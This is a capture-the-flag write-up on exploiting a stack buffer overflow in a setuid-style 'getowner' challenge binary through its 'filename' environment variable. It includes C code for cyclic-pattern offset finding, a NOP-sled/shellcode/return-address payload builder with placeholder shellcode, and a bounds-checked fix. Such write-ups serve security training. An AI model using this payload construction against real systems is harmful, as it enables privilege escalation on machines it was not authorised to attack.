This challenge welcomes us with two files, getowner and getowner.c, in our level2 home directory. This is great, as it's always nice when a challenge comes with source code. Running the application prints the error "No filename configured!", and passing arguments doesn't change anything.
[Figure: Running getowner with some arguments]
Since this doesn't seem very helpful, I take a quick look at the source. Even a cursory read shows a buffer overflow: the program copies data with strcpy() into a fixed-size buffer without checking its length.
[Figure: Vulnerable code]
Reading more of the code helps me understand how to approach this challenge. It looks for an environment variable named filename. Setting it and re-running the binary quickly shows that this is the intended use of the program.
[Figure: getowner running with the filename environment variable set]
The code shows the value of filename being copied into a fixed-size buffer with no bounds check. Armed with this information, the plan is clear: trigger the buffer overflow by giving the filename environment variable a very long value.
[Figure: Triggering the buffer overflow]
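As an added illustration (not getowner's actual source, which the page shows only as a screenshot), here is the strcpy() pattern the writeup describes, beside a bounds-checked replacement. The buffer size of 128 and the function names are assumptions; the error string is the one the page reports.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size; the page does not quote getowner's actual declaration. */
#define FILENAME_BUF 128

/* The pattern the writeup identifies in getowner.c: the environment value is
 * copied with strcpy(), which writes strlen(src)+1 bytes no matter how large
 * dst is. dstlen is accepted only to show that it is ignored. */
int get_filename_unsafe(char *dst, size_t dstlen, const char *env_value) {
    (void)dstlen;
    if (env_value == NULL)
        return -1;                 /* the "No filename configured!" case */
    strcpy(dst, env_value);        /* overflows when strlen(env_value) >= dstlen */
    return 0;
}

/* Hardened form: reject anything that does not fit together with its
 * terminator, and copy exactly the bytes that were checked. */
int get_filename_safe(char *dst, size_t dstlen, const char *env_value) {
    if (env_value == NULL)
        return -1;
    size_t n = strlen(env_value);
    if (n >= dstlen)
        return -2;                 /* would overflow, or leave no room for the NUL */
    memcpy(dst, env_value, n + 1);
    return 0;
}

int main(void) {
    char name[FILENAME_BUF];
    int rc = get_filename_safe(name, sizeof name, getenv("filename"));
    if (rc == -1) {
        fputs("No filename configured!\n", stderr);
        return 1;
    }
    if (rc == -2) {
        fputs("filename too long\n", stderr);
        return 1;
    }
    printf("using file: %s\n", name);
    return 0;
}
```

With filename set to a 300-byte string, the unsafe version writes 173 bytes past the end of a 128-byte buffer; the safe version returns -2 and never touches the stack beyond the buffer.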
It works! Now that we know how to trigger the vulnerability reliably, it's time to get down and dirty with gdb and get our exploit ready.
[Figure: EIP is overwritten]
We can see here that EIP has been overwritten with the A's from our filename environment variable. Things are looking good. The next step is to calculate the distance to the saved return address. For this I used Metasploit's pattern_create.rb and pattern_offset.rb: generate a cyclic pattern, put it in filename, read the value that lands in EIP under gdb, and look that value up in the pattern. This gives an offset of 151 bytes.
Now all we need to do is craft our filename environment variable as [nops][shellcode][ret], with ret pointing back into the NOP sled, and we should be good to go! One caveat: because the payload travels in an environment variable, it is a C string and cannot contain a NUL byte, so the return address has to be chosen with that in mind.
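The two steps above, finding the offset with a cyclic pattern and then laying out [nops][shellcode][ret], as an added example that is not part of the original writeup. The pattern format is the one pattern_create.rb emits (Aa0Aa1...Zz9); the offset of 151 is the page's own figure; the EIP value, the return address 0xbffff5c0 and the four int3 bytes standing in for shellcode are constructed for illustration and must be replaced with values read from gdb and a real payload.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Generate the Metasploit-style cyclic pattern "Aa0Aa1Aa2...Zz9" used by
 * pattern_create.rb. Writes at most cap-1 bytes plus a NUL; returns the length. */
size_t pattern_create(char *out, size_t cap) {
    size_t pos = 0;
    if (cap == 0) return 0;
    for (char u = 'A'; u <= 'Z' && pos + 1 < cap; u++)
        for (char l = 'a'; l <= 'z' && pos + 1 < cap; l++)
            for (char d = '0'; d <= '9' && pos + 1 < cap; d++) {
                const char triple[3] = { u, l, d };
                for (int i = 0; i < 3 && pos + 1 < cap; i++)
                    out[pos++] = triple[i];
            }
    out[pos] = '\0';
    return pos;
}

/* pattern_offset.rb equivalent: the 32-bit value gdb shows in EIP was loaded
 * little-endian from the stack, so turn it back into the 4 bytes that sat
 * there and find where they occur in the pattern. Returns -1 if absent. */
long pattern_offset(const char *pat, size_t len, uint32_t eip) {
    unsigned char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (unsigned char)((eip >> (8 * i)) & 0xff);
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Lay out [nops][shellcode][ret]: the NOP sled and shellcode fill the
 * `offset` bytes before the saved return address, and `ret` (written
 * little-endian) overwrites it. Returns the payload length, or 0 if the
 * shellcode alone does not fit in front of the return address. */
size_t build_payload(unsigned char *out, size_t offset,
                     const unsigned char *sc, size_t sclen, uint32_t ret) {
    if (sclen > offset) return 0;
    size_t nops = offset - sclen;
    memset(out, 0x90, nops);                 /* x86 NOP sled */
    memcpy(out + nops, sc, sclen);
    for (int i = 0; i < 4; i++)
        out[offset + i] = (unsigned char)((ret >> (8 * i)) & 0xff);
    return offset + 4;
}

/* An environment variable is a C string: a NUL byte anywhere in the payload
 * truncates it, so an address such as 0x08048000 cannot be delivered this way. */
int payload_has_nul(const unsigned char *p, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0) return 1;
    return 0;
}

int main(void) {
    char pat[512];
    size_t n = pattern_create(pat, sizeof pat);
    /* Constructed: pretend gdb showed EIP = 0x66413066 after the crash. */
    printf("offset of 0x66413066 in pattern: %ld\n",
           pattern_offset(pat, n, 0x66413066u));

    /* Stand-in shellcode: four int3 breakpoints, not a real shell spawner. */
    const unsigned char sc[] = { 0xcc, 0xcc, 0xcc, 0xcc };
    unsigned char payload[256];
    /* 151 is the offset from the writeup; the return address is a made-up
     * stack address and must be replaced with one read from gdb. */
    size_t plen = build_payload(payload, 151, sc, sizeof sc, 0xbffff5c0u);
    payload[plen] = '\0';
    printf("payload length %zu, contains NUL: %d\n",
           plen, payload_has_nul(payload, plen));
    /* To deliver it: setenv("filename", (char *)payload, 1) and exec ./getowner,
     * or write the bytes to a file and export them from the shell. */
    return 0;
}
```

The lookup in pattern_offset() reverses the byte order because gdb prints EIP as a number while the pattern sits in memory byte by byte; feeding the printed value in as-is is the most common way to get a wrong offset. Pick the return address from the middle of the sled as seen in gdb, and re-check it from a normal shell, since the environment layout (and so the stack addresses) shifts with the size of the environment and argv.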
[Figure: Elevated shell]